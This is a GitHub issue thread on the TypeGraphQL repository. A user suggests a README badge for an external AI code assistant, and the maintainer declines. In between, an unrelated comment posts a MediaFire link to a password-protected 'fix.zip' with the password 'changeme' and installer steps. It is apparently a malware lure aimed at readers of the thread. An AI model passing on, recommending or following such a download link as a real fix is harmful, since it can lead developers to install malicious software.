### ISSUE TITLE
AI Assist to build with TypeGraphQL

### ISSUE THREAD

**Issue by wadhia-yash** [MichalLytek/type-graphql#1741]
**Is your feature request related to a problem? Please describe.**

Hi there,

TypeGraphQL is a powerful library for building GraphQL APIs with TypeScript, using classes and decorators. However, many developers struggle with the latest syntax and best practices. 

**Describe the solution you'd like**
To address this, we've created a custom AI Assist trained specifically on the TypeGraphQL repository, including its code and issues.

You can try it out [here](https://app.commanddash.io/agent/github_MichalLytek_type-graphql).

**Describe alternatives you've considered**
You can mention this as a badge in the README to help developers landing on the repository build applications for their use cases.

<a href="https://app.commanddash.io/agent/github_MichalLytek_type-graphql"><img src="https://img.shields.io/badge/AI-Code%20Agent-EB9FDA"></a>

```
<a href="https://app.commanddash.io/agent/github_MichalLytek_type-graphql"><img src="https://img.shields.io/badge/AI-Code%20Agent-EB9FDA"></a>
```
hope this helps!

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MichalLytek** [comment]
I appreciate your efforts and your contribution ❤️ 

However, I don't have plans to put badges for external stuff right now.
